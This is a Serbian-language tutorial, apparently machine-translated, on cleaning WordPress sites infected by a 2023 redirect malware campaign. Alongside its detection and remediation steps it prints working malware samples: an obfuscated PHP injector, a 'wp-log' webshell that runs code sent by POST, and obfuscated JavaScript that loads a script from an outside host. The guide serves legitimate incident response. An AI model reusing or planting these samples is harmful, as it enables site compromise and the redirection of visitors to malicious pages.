Fix Redirect WordPress Hack 2023 (Вирус за преусмеравање)

WordPress то је дефинитивно најкоришћенија платформа CMS (Content Management System) и за блогове и за стартер онлајн продавнице (са модулом WooCommerce), што га чини најметом компјутерских напада (хаковање). Једна од најчешће коришћених хакерских операција има за циљ да преусмери угрожену веб локацију на друге веб странице. Redirect WordPress Hack 2023 је релативно нов малвер који има утицај на преусмеравање целог сајта на нежељене веб странице или који заузврат може да зарази рачунаре корисника.

Ако се ваш сајт развија на WordPress је преусмерен на други сајт, онда је највероватније жртва већ познатог хака за преусмеравање.

У овом туторијалу ћете пронаћи потребне информације и корисне савете помоћу којих можете да девирусујете веб локацију заражену преусмеравањем WordPress Hack (Virus Redirect). Кроз коментаре можете добити додатне информације или затражити помоћ.

Откривање вируса који преусмерава сајтове WordPress

Нагло и неоправдано смањење посећености сајта, смањење броја поруџбина (у случају онлајн продавница) или прихода од оглашавања први су знаци да нешто није у реду. Откривање "Redirect WordPress Hack 2023” (Преусмеравање вируса) се такође може урадити „визуелно” када отворите веб локацију и будете преусмерени на другу веб страницу.

Из искуства, већина веб малвера је компатибилна са интернет претраживачима: Chrome, Firefox, Edge, Opera. Ако сте корисник рачунара Mac, ови вируси нису заиста видљиви у претраживачу Safari. Сигурносни систем од Safari тихо блокирајте ове злонамерне скрипте.

Шта да радите ако имате веб локацију заражену Redirect WordPress Hack

Надам се да први корак није паника или брисање веб странице. Чак ни заражене или вирусне датотеке не треба прво брисати. Они садрже вредне информације које вам могу помоћи да разумете где је безбедносна повреда и шта је утицало на вирус. Модус операнди.

Затворите веб локацију за јавност.

Како затворити вирусну веб локацију за посетиоце? Најједноставније је да користите ДНС менаџер и избришете ИП за „А“ (име домена) или дефинишете непостојећи ИП. Тако ће посетиоци сајта бити заштићени од овога redirect WordPress hack што их може довести до вирусних или СПАМ веб страница.

Ако користите CloudFlare као ДНС менаџер, пријављујете се на налог и бришете ДНС записе "A” за име домена. Тако ће домен погођен вирусом остати без ИП адресе и више неће моћи да му се приступи са Интернета.

Копирате ИП веб локације и „рутирате“ је тако да само ви можете да јој приступите. Са вашег рачунара.

Како променити прави ИП веб локације на рачунарима Windows?

Метода се често користи за блокирање приступа одређеним веб локацијама уређивањем датотеке "хостс".

1. Отвориш Notepad или други уређивач текста (са правима administrator) и уредите датотеку "hosts„. Налази се у:

C:\Windows\System32\drivers\etc\hosts

2. У датотеци „хостс“ додајте „роуте“ до стварног ИП-а ваше веб локације. ИП је горе избрисан из ДНС менаџера.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Сачувајте датотеку и приступите веб локацији у претраживачу.

Ако се веб локација не отвори и нисте урадили ништа лоше у датотеци „хостс“, то је највероватније ДНС кеш.

Да обришете ДНС кеш на оперативном систему Windows, отворен Command Prompt, где покрећете команду:

ipconfig /flushdns

Како променити прави ИП веб локације на рачунарима Mac / MacБоок?

За кориснике рачунара Mac нешто је једноставније променити прави ИП веб-сајта.

1. Отворите услужни програм Terminal.

2. Покрените командну линију (за покретање је потребна системска лозинка):

sudo nano /etc/hosts

3. Исто као и за рачунаре Windows, додајте стварну ИП адресу домена.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Сачувајте промене. Ctrl+X (y).

Након што сте „рутирали“, ви сте једина особа са којом може да приступи зараженој веб локацији Redirect WordPress Hack.

Потпуна резервна копија веб локације – датотеке и база података

Чак и ако је заражен са „redirect WordPress hack“, препорука је да направите општу резервну копију целе веб странице. Фајлови и база података. Можда бисте такође могли да сачувате локалну копију обе датотеке из public / public_html као и база података.

Идентификација заражених датотека и оних које је модификовао Redirect WordPress Hack 2023

Главни циљни фајлови WordPress Сунт index.php (у корену), header.php, index.php си footer.php теме WordPress средства. Ручно проверите ове датотеке и идентификујте злонамерни код или скрипту злонамерног софтвера.

2023. вирус „Redirect WordPress Hack" ставити у index.php код облика:

(Не препоручујем покретање ових кодова!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Дешифровано, ово злонамерна скрипта то је у основи последица заражене веб локације WordPress. То није скрипта иза малвера, то је скрипта која омогућава преусмеравање заражене веб странице. Ако декодирамо горњу скрипту, добићемо:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Да бисте идентификовали све датотеке на серверу које садрже овај код, добро је имати приступ SSH на сервер за покретање командних линија за проверу датотека и управљање Linux.

Релатед: Како да сазнате да ли је ваш блог заражен или не, уз помоћ Google Search . (WordPress Вирус)

Испод су две команде које су дефинитивно корисне за идентификацију недавно измењених датотека и датотека које садрже одређени код (стринг).

Како видите на Linux ПХП датотеке су промењене у последња 24 сата или у неком другом временском оквиру?

Наручи “find” је веома једноставан за коришћење и омогућава прилагођавање за постављање временског периода, путање за претрагу и врсте датотека.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

У излазу ћете добити информације о датуму и времену када је датотека модификована, дозволама за писање / читање / извршавање (chmod) и којој групи/кориснику припада.

Ако желите да проверите пре више дана, промените вредност "-mtime -1” или користите „-mmin -360” за минуте (6 сати).

Како тражити код (стринг) унутар ПХП, Јава датотека?

Командна линија „пронађи“ која вам омогућава да брзо пронађете све ПХП или Јава датотеке које садрже одређени код је следећа:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Команда ће претражити и приказати датотеке .php си .js који садржи "uJjBRODYsU".

Уз помоћ две горње команде врло лако ћете сазнати које су датотеке недавно измењене, а које садрже малвер код.

Уклања злонамерни код из модификованих датотека без угрожавања исправног кода. У мом сценарију, малвер је постављен пре отварања <head>.

Приликом извршавања прве команде „пронађи“ врло је могуће открити нове датотеке на серверу, које нису ваше WordPress нити ставите тамо од вас. Датотеке које припадају типу вируса Redirect WordPress Hack.

У сценарију који сам истражио, датотеке облика „wp-log-nOXdgD.php„. Ово су „спавн“ датотеке које такође садрже малвер код који користи вирус за преусмеравање.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Сврха датотека типа "wp-log-*” је ширење хакерског вируса за преусмеравање на друге веб локације које се налазе на серверу. То је код малвера типа „webshell” у саставу а основни одељак (у којој су дефинисане неке шифроване варијабле) и о одељак за извршење преко којих нападач покушава да учита и изврши злонамерни код на систему.

Ако постоји променљива POST назван 'bh' и његову шифровану вредност MD5 је једнако "8f1f964a4b4d8d1ac3f0386693d28d03“, тада се појављује скрипта да пише шифровани садржај base64 друге променљиве под називом 'b3' у привремену датотеку, а затим покушава да укључи ову привремену датотеку.

Ако постоји променљива POST или GET назван 'tick', скрипта ће одговорити са вредношћу MD5 низа "885".

Да бисте идентификовали све датотеке на серверу које садрже овај код, изаберите низ који је уобичајен, а затим покрените команду „find” (слично оном изнад). Избришите све датотеке које садрже овај малвер код.

Безбедносна грешка коју је искористио Redirect WordPress Hack

Највероватније овај вирус преусмеравања стиже преко искоришћавање корисника администрације WordPress или идентификацијом а рањиви додатак који омогућава додавање корисника са привилегијама од administrator.

За већину веб локација направљених на платформи WordPress могуће је уређивање датотека тема или додатакаиз интерфејса администрације (Dashboard). Дакле, злонамерна особа може додати код малвера у датотеке тема да би генерисала горе приказане скрипте.

Пример таквог кода злонамерног софтвера је следећи:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript идентификовано у заглављу теме WordPress, одмах након отварања етикете <head>.

Прилично је тешко дешифровати овај ЈаваСцрипт, али је очигледно да он тражи другу веб адресу одакле највероватније преузима друге скрипте за креирање датотека "wp-log-*” о којој сам говорио горе.

Пронађите и избришите овај код из свих датотека PHP под утицајем.

Колико сам могао да проценим, овај код је био ручно додато од новог корисника са административним привилегијама.

Дакле, да бисте спречили додавање злонамерног софтвера са контролне табле, најбоље је да онемогућите опцију за уређивање WordPress Теме / додаци са контролне табле.

Уредите датотеку wp-config.php и додајте редове:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Након ове промене нема корисника WordPress више нећете моћи да уређујете датотеке са контролне табле.

Проверите кориснике са улогом Administrator

Испод је СКЛ упит који можете користити за тражење корисника са улогом administrator у платформи WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Овај упит ће вратити све кориснике у табели wp_users који је доделио улогу administrator. Упит се врши и за табелу wp_usermeta за претрагу у мета 'wp_capabilities', који садржи информације о корисничким улогама.

Други метод је да их идентификујете од: Dashboard → Users → All Users → Administrator. Међутим, постоје праксе помоћу којих се корисник може сакрити на контролној табли. Дакле, најбољи начин да видите кориснике "Administrator"У WordPress је СКЛ команда изнад.

У мом случају, идентификовао сам у бази података корисника са именом "wp-import-user„. Прилично сугестивно.

Такође одавде можете видети датум и време корисника WordPress је створен. Кориснички ИД је такође веома важан јер претражује логове сервера. На овај начин можете видети све активности овог корисника.

Избришите кориснике са улогом administrator што онда не знаш промените лозинке свим административним корисницима. Уредник, аутор, Administrator.

Промените лозинку корисника СКЛ базе података погођене веб странице.

Након предузимања ових корака, веб локација се може поново покренути за све кориснике.

Имајте на уму, међутим, да је оно што сам горе представио један од можда хиљада сценарија у којима је веб локација заражена Redirect WordPress Hack у 2023.

Ако је ваша веб локација заражена и потребна вам је помоћ или ако имате питања, одељак за коментаре је отворен.